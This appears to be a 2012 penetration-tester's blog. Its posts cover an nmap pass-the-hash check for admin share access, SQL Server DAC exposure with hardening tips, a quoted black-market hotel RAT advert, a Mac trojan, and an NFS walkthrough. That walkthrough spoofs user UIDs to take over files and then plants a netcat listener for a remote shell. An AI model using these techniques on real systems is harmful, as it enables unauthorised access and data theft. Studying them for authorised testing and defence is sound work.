Thursday, July 26, 2012

Update to the NMAP Pass the Hash script

I've had a lot of questions about this, so let's see if this helps. When I score a password or a hash, I use an nmap script to quickly determine if this gives me local admin rights to the workstations and servers:

nmap --script=smb-enum-shares.nse --script-args=smbuser=[ADMIN],smbpass=[PASSWORD],smbdomain=[DOMAIN],smbbasic=1,smbtype=v1  -p445 --open -vv -Pn [IP RANGE TO TEST] -oA [FILENAME].txt 

smbuser=[ADMIN] = Shared administrator account name
smbpass=[PASSWORD] = The shared account password
Alternatively you can Pass-the-Hash using:
smbdomain=[DOMAIN] = WORKGROUP or AD

[FILENAME] = The filename for the results output
[IP RANGE TO TEST] = The IP ranges in CIDR notation. 
Alternatively, you could make a list of all IPs and IP ranges and pass them to the scan using:
 "–iL [INPUT LIST TO SCAN].txt" 
Forces the authentication to use basic security, as opposed to "extended security". 
--          Against most modern systems, extended security should work, but there may be cases
--          where you want to force basic. There's a chance that you'll get better results for 
--          enumerating users if you turn on basic authentication.
The type of SMB authentication to use. These are the possible options:
-- * <code>v1</code>:     Sends LMv1 and NTLMv1.
-- * <code>LMv1</code>:   Sends LMv1 only.
-- * <code>NTLMv1</code>: Sends NTLMv1 only (default).
-- * <code>v2</code>:     Sends LMv2 and NTLMv2.
-- * <code>LMv2</code>:   Sends LMv2 only.
-- * <code>NTLMv2</code>: Doesn't exist; the protocol doesn't support NTLMv2 alone.

If you have local administrator rights, the scan will show READ/WRITE access to the SMB shares:

Starting Nmap 5.51 ( ) at 2012-12-22 15:41 PDT
Nmap scan report for
Host is up (0.00069s latency).
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   ADMIN$
|     Comment: Remote Admin
|     Users: 0, Max: <unlimited>
|     Path: C:\Windows
|     Anonymous access: <none>
|     Current user ('admin') access: READ/WRITE
|   C$
|     Comment: Default share
|     Users: 0, Max: <unlimited>
|     Path: C:\
|     Anonymous access: <none>
|     Current user ('admin') access: READ/WRITE
|   D$
|     Comment: Default share
|     Users: 0, Max: <unlimited>
|     Path: D:\
|     Anonymous access: <none>
|     Current user ('admin') access: READ/WRITE
|   IPC$
|     Comment: Remote IPC
|     Users: 2, Max: <unlimited>
|     Path: 
|     Anonymous access: READ <not a file share>
|     Current user ('sysadmin') access: READ <not a file share>
|     Comment: 
|     Users: 1, Max: <unlimited>
|     Path: D:\SQLBACKUP
|     Anonymous access: <none>
|_    Current user ('admin') access: READ/WRITE

Thursday, July 5, 2012

Hacking Microsoft SQL Dedicated Admin Connection (DAC)

Microsoft SQL Dedicated Admin Connection (DAC)

Microsoft SQL Server 2005/2008/2012 provides a dedicated administrator connection (DAC). The DAC lets an administrator access a running server to execute diagnostic functions or Transact-SQL statements, or to troubleshoot problems on the server, even when the server is locked or running in an abnormal state and not responding to a SQL Server Database Engine connection. This feature requires pre-allocating dedicated resources during server startup like additional memory ~3.5 megs.  Because of this extra resource, in SQL Express scenarios the DAC feature is disabled. You can enable it by starting SQL Server service with a trace flag. By default, the DAC is only available from a client on the server. To enable client applications on remote computers to use the DAC, use the remote admin connections option of sp_configure.

SQL Server listens for the DAC on TCP port 1434 if available or a TCP port dynamically assigned upon Database Engine startup. The error log contains the port number the DAC is listening on. By default the DAC listener accepts connection on only the local port. To activate remote administration connections, see the remote admin connections Server Configuration Option below.

The following example enables the DAC from a remote computer.

sp_configure 'remote admin connections', 1;

In this example, an administrator notices that server 172.16.x.x is not responding and wants to diagnose the problem. To do this, the user activates the sqlcmd command prompt utility and connects to server 172.16.x.x using -A to indicate the DAC.

C:\Users\Win7>sqlcmd -A -S 172.16.x.x -U sa -P Bob$yourUncl3

DAC with remote admin connections permitted may allow an attacker to bypass access controls, logon triggers, perform brute force attacks or run unauthorized queries.

Ensure DAC is configured per your Microsoft SQL Server Build and Hardening Documentation and Policies.

To determine the state of the DAC:

sp_configure 'remote admin connections'

0: Indicates only local connections are allowed by using the DAC.
1: Indicates remote connections are allowed by using the DAC.

Detecting DAC using NMap:

bash-3.2$ nmap 172.16.1-3.1-254 -p1434 -vv --open -Pn -n

Starting Nmap 5.51 ( ) at 2012-06-28 09:56 PDT
Initiating Connect Scan at 09:56
Scanning 762 hosts [1 port/host]
Discovered open port 1434/tcp on 172.16.x.1
Discovered open port 1434/tcp on 172.16.x.2

Failed Logons will appear in the Windows Application Event Log:

Windows Event Log:

Event Type:    Failure Audit
Event Source:    MSSQLSERVER
Event Category:    (4)
Event ID:    18456
Date:        6/28/2012
Time:        10:08:18 AM
User:        N/A
Computer:    SQL01PRD
Login failed for user 'sa'. [CLIENT: 10.16.x.x]

Additional DAC related messages to monitor for:


Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag %d. This is an informational message only. No user action is required.


Changing the remote access settings for the Dedicated Admin Connection failed with error 0x%lx, status code 0x%lx.


Dedicated admin connection support was established for listening remotely on port %d.


Could not connect because the maximum number of '%ld' dedicated administrator connections already exists. Before a new connection can be made, the existing dedicated administrator connection must be dropped, either by logging off or ending the process.%.*ls

SQL Server Management Studio Tips

How do I indicate a different port number when connecting to the server using SQL management Studio?,6283 add a comma between the ip and port

How do I Connect To A Database Using Windows Authentication With Different Credentials Using SQL Server Management Studio?

runas /netonly /user:domain\name "C:\Program Files\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\Ssms.exe"

Friday, April 20, 2012

Hotel Front Desk Systems Targeted with Malware
Recent reports highlight the growing threat of malware specialization. Rather than taking a shotgun approach, malware designers are targeting specific situations for greatest impact. Web Browser security developer Trusteer found an advertisement on a black market forum for a custom malware designed to infect hotel front desk computers and steal customer credit cards.
Hello all, I’m offering Hotel RATs. In other words: A virtual skimmer.
Benefits of a Hotel (Remote Access Trojan Connection) is an infected front desk computers on which the hotel has its software that reads the number on the cc and spits out the information on the screen and it’s keyloggable if you keylog every stroke. 
I’m offering this method for $280, guaranteed US/Canada/UK connections and a method on how to obtain them on your own. From showing you how to setup your RAT (which includes a free crypt – fully undetectable to all Antiviruses) along with selling you the tutorial on how to Social Engineer/Manipulate the front desk manager on the phone via VoIP. 
I can prove my legitimacy and the accuracy of this method. PM me if you are interested.

My view:

Much has been made of the author's claim to be able to bypass all Anti-viruses, as if this was a new and alarming chapter in the ongoing cyberwar. Truth is,  bypassing AV isn't new or particularly difficult. PSC regularly makes use of the ability to bypass all modern AV engines in the course of our pen tests. Anti-virus and malware detection should be considered only one part of a multi-layered approach to system hardening and protection.

Ideally, Point of Sale (POS) systems should be dedicated, with no additional functionality. It's critical to reduce the attack surface and adding web browsing, email, and other software only increases the number of vectors and risk to customer data. If it's critical for the systems to have multiple uses, consider using the following controls to limit your exposure:

Application Whitelisting, such as with Bit9's Parity (, will limit what software can execute on the POS systems. If web browsing is critical, the Browser Sandboxing/Virtualization from Vendors such as invincea ( or Trusteer ( can prevent malware from executing at the operating system level. Finally, Full Disk Encryption is a necessary to prevent local users from disabling the other controls put in place. McAfee Endpoint Protection ( for the Enterprise or TrueCrypt ( for smaller environments are possible solutions.

The final, and perhaps the most critical security control, is User Education. The malware author makes a point to sell a tutorial on social engineering, because without it his software is useless. Malware takes advantage of a user's inattention and lack of education. Properly train your end-users to be suspicious and require verification from whom they're receiving emails and files.

Tuesday, April 17, 2012

Apple OSX is finally encroaching on well established Windows territory: Viruses

Hot on the heels of Flashback, reports are circulating of another Mac-specific trojan. The new Trojan, called ‘Backdoor.OSX.SabPub.a’ uses a similar Java exploit as Flashback to infect the Mac computers via Microsoft Office docs. This new threat is a custom OS X backdoor, that once activated, connects to a remote website in command and control fashion to fetch instructions. The backdoor contains functionality to make screenshots of the user’s current session, download files and execute commands on the infected machine.


Mac users have enjoyed a prolonged period of relative safety, but as the Cupertino operating system gains traction in the workplace, hackers begin to see it as a viable alternative to hacking Windows. However, the last few established attacks have taken advantage of ancillary software, such as Java, Adobe Reader and Microsoft Office, not the base OS. This means that in addition to operating system patches, all other applications should be included in your regular patching cycle. Products like Secunia's Corporate Software Inspector ( and VMWare's System Center Configuration Manager ( support, Windows, Linux and OSX and provide patch management for all installed software.

Adding anti-virus to a Mac has been historically an unneeded processor overhead but is now a necessity. Standalone products like Avast! ( and ClamxAV ( are good solutions for small offices and home users, but lack the tracking and reporting capabilities necessary for the Enterprise. McAfee Virus Scan for Mac ( integrates into their System Center Configuration Manager McAfee ePolicy Orchestrator (ePO) platform for full accountability and risk management. The Symantec AntiVirus for Macintosh Corporate Edition has similar capabilities.

In summary, Apple OSX has grabbed a greater share of both the corporate and hacking worlds and must now be fully integrated into your Patch Management policies and procedures. 

Monday, March 19, 2012

Exploiting Network File System (NFS) shares

Clients with old Sun/unix boxes routinely have NFS shares that nobody thinks about. Next time you’re on an internal, keep this in mind:

NFS on a system can be determined if port 2049 is open, and while this is a good indication, it doesn't actually prove any folders are being offered.  A good way to determine this is to issue the command:

showmount -e IP_Address

Hopefully the results will look something like this:

root@attacker]# showmount -e
Export list for
/export/home/  (everyone)
/export/mnt/   (everyone)
/export/share/ (everyone)

In the example above you see /export/home is open giving a good indication that possibly profiles or home directories are stored in this directory.  If this is the case a couple of in-built pieces of security exists on the system, they are; file permissions and the use of the sticky bit i.e. only that user can interact with their own files.

To mount an NFS share use the following after first creating a directory on your local machine:

[root@attacker~]#mount -t nfs /local_dir

Hopefully is this goes well if you change directory to /local_dir you can see all sub directories on the remote machine in /export/home.

You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read.  The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.  

-rwxr----- 517 wheel 898 daves_secret_doc 

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share
umount /local_dir

create a user called dave
useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directory
cd dave

issue the command
su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc.

As an extension to this you can amend daves scripts etc. to run commands, tftp stuff onto the box and do basically whatever you please.  The best thing to do obviously is to drop a hidden netcat listener into daves directory and get it to open a port and once again you can then get that infamous interactive shell on the remote box.  NEAT!!

(Reposted from